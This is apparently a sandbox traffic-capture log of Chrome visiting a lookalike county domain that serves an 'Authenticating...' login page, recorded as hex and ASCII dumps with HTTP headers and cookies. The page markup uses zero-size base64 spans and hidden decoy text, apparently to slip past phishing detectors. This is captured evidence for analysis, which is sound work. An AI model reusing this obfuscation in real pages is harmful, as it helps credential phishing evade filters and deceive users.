                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 72 66 61 63 65 7d 2c 6b 29 2c 51 6e 3d 28 6a 3d 22 63 61 72 6f 75 73 65 6c 22 2c 4c 3d 22 2e 22 2b 28 48 3d 22 62 73 2e 63 61 72 6f 75 73 65 6c 22 29 2c 52 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 78 3d 28 50 3d 65 29 2e 66 6e 5b 6a 5d 2c 57 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 7d 2c 55 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c
                                                                          Data Ascii: rface},k),Qn=(j="carousel",L="."+(H="bs.carousel"),R=".data-api",x=(P=e).fn[j],W={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean"},
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 74 29 26 26 28 46 6e 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 74 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73
                                                                          Data Ascii: |(this._isPaused=!0),this._element.querySelector(et)&&(Fn.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 54 4f 55 43 48 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 75 73 65 28 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 2c 35 30 30 2b 65 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 7d 29 29 7d 2c 74 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72
                                                                          Data Ascii: art"in document.documentElement&&P(this._element).on(Q.TOUCHEND,function(){e.pause(),e.touchTimeout&&clearTimeout(e.touchTimeout),e.touchTimeout=setTimeout(function(t){return e.cycle(t)},500+e._config.interval)}))},t._keydown=function(t){if(!/input|textar
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 2c 73 29 2c 63 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 6c 29 2c 68 3d 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 3b 69 66 28 74 3d 3d 3d 71 3f 28 6e 3d 4a 2c 69 3d 5a 2c 72 3d 4b 29 3a 28 6e 3d 7a 2c 69 3d 47 2c 72 3d 4d 29 2c 6c 26 26 50 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 56 29 29 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3b 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 72 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 73 26 26 6c 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 5f 73 65 74 41 63 74 69 76 65 49 6e 64 69 63 61 74 6f 72
                                                                          Data Ascii: ,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(t===q?(n=J,i=Z,r=K):(n=z,i=G,r=M),l&&P(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,r).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),this._setActiveIndicator
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 65 2d 74 6f 22 29 3b 72 26 26 28 69 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 50 28 6e 29 2c 69 29 2c 72 26 26 50 28 6e 29 2e 64 61 74 61 28 48 29 2e 74 6f 28 72 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 33 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 5d 29 2c 6f 7d 28 29 2c 50 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 51 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 69 74 2c 6f 74 2e 5f 64 61 74 61 41 70 69 43 6c 69
                                                                          Data Ascii: e-to");r&&(i.interval=!1),o._jQueryInterface.call(P(n),i),r&&P(n).data(H).to(r),t.preventDefault()}}},s(o,null,[{key:"VERSION",get:function(){return"4.1.3"}},{key:"Default",get:function(){return W}}]),o}(),P(document).on(Q.CLICK_DATA_API,it,ot._dataApiCli


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.649786104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:14 UTC1271OUTGET /home6dca65610bad709b07a9e6041699d6ce HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:15 UTC752INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:15 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=isRtNv3FDRyIsv5XModR6uELsXpj2IK%2FqpxxlM6IkDyDvxyVAyfXKeiALdVLja3LCeRdQIGH9BDZZR0p6XyEEmNN%2Fs2FrNCbk5Mfm86K%2FMBYaAWR3bCkfb5otGXD%2ByMDPYaQMwgkNvh4uzrFSDo27%2F4fBdcryMo%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff8732b0f425e-EWR
                                                                          2024-10-01 22:43:15 UTC617INData Raw: 31 66 30 36 0d 0a 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 75 74 68 65 6e 74 69 63 61 74 69 6e 67 2e 2e 2e 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63
                                                                          Data Ascii: 1f06 <!DOCTYPE html><html dir="ltr" class="" lang="en"> <head> <title> Authenticating... </title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" c
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 32 73 76 67 2f 5a 4c 57 68 76 58 5a 79 31 36 4e 59 53 4d 57 26 71 75 6f 74 3b 29 3b 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 20 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 26 71 75 6f 74 3b 32 73 76 67 2f 5a 4c 57 68 76 58 5a 79 31 36 4e 59 53 4d 57 26 71 75 6f
                                                                          Data Ascii: <div class="background " role="presentation"> <div style="background-image: url(2svg/ZLWhvXZy16NYSMW&quot;);"></div> <div class="backgroundImage " style="background-image: url(&quot;2svg/ZLWhvXZy16NYSMW&quo
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 64 61 74 61 2d 76 69 65 77 69 64 3d 22 31 22 20 64 61 74 61 2d 73 68 6f 77 66 65 64 63 72 65 64 62 75 74 74 6f 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 74 69 74 6c 65 20 22 20 69 64 3d 22 6c 6f 67 69 6e 48 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: <div data-viewid="1" data-showfedcredbutton="true"> <div> <div class="row text-title " id="loginHeader">
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70
                                                                          Data Ascii: ext-error" id="usernameError"> E<span style="line-height: 0; font-size: 0px;">Ug==</span>n<span style="line-height: 0; font-size: 0px;">Ug==</span>t<span style="line-height: 0; font-size: 0px;">Ug==</sp
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f
                                                                          Data Ascii: yle="line-height: 0; font-size: 0px;">Ug==</span>r<span style="line-height: 0; font-size: 0px;">Ug==</span>e<span style="line-height: 0; font-size: 0px;">Ug==</span>s<span style="line-height: 0; font-size: 0px;">Ug==</span>s<span style="line-height: 0; fo
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 79 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 55 67 3d 3d 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74
                                                                          Data Ascii: ;">Ug==</span>S<span style="line-height: 0; font-size: 0px;">Ug==</span>k<span style="line-height: 0; font-size: 0px;">Ug==</span>y<span style="line-height: 0; font-size: 0px;">Ug==</span>p<span style="line-height: 0; font-size: 0px;">Ug==</span>e<span st
                                                                          2024-10-01 22:43:15 UTC488INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 22 20 68 69 64 64 65 6e 3e 57 6f 72 6c 64 20 73 65 65 73 20 6e 65 77 20 70 6f 6c 69 63 79 3c 2f 73 70 61 6e 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 62 75 74 74 6f 6e 73 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: </div><span style="" hidden>World sees new policy</span> <div class="position-buttons "> <div class="row ">
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 31 36 62 66 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 62 41 3d 3d 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 62 41 3d 3d 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 62 41 3d 3d 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79
                                                                          Data Ascii: 16bf N<span style="line-height: 0; font-size: 0px;">bA==</span>o<span style="line-height: 0; font-size: 0px;">bA==</span> <span style="line-height: 0; font-size: 0px;">bA==</span>a<span sty
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 22 20 6e 61 6d 65 3d 22 63 72 65 61 74 65 41 63 63 6f 75 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4e 41 3d 3d 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20
                                                                          Data Ascii: <a href="#" aria-label="" name="createAccount"> C<span style="line-height: 0; font-size: 0px;">NA==</span>a<span style="line-height: 0;
                                                                          2024-10-01 22:43:15 UTC1369INData Raw: 70 78 3b 22 3e 4e 41 3d 3d 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4e 41 3d 3d 3c 2f 73 70 61 6e 3e 75 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4e 41 3d 3d 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4e 41 3d 3d 3c 2f 73 70 61 6e 3e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 70 78 3b 22 3e 4e 41 3d 3d 3c 2f 73 70 61 6e 3e 3f 20 20 20 20 20 20
                                                                          Data Ascii: px;">NA==</span>o<span style="line-height: 0; font-size: 0px;">NA==</span>u<span style="line-height: 0; font-size: 0px;">NA==</span>n<span style="line-height: 0; font-size: 0px;">NA==</span>t<span style="line-height: 0; font-size: 0px;">NA==</span>?


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.649787104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:15 UTC1310OUTGET /favicon.ico HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:15 UTC664INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 01 Oct 2024 22:43:15 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: max-age=14400
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rCr0V%2FzgHZB%2BkWu9A6kT0o8yVOOUO9ZQU%2F3IFWHGE7VCtYczsC6PaihKy12vNUyOx%2F8HLX7l3J3kBJXffTGPm0blB8sp3gmb7BxcxX9eT2l9orEpF8ozeSxwvfnCStFChG8%2BTs%2BB%2BlgJ9LOUtGw%2BrHE3g6R1kMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff873beed8c06-EWR
                                                                          2024-10-01 22:43:15 UTC321INData Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
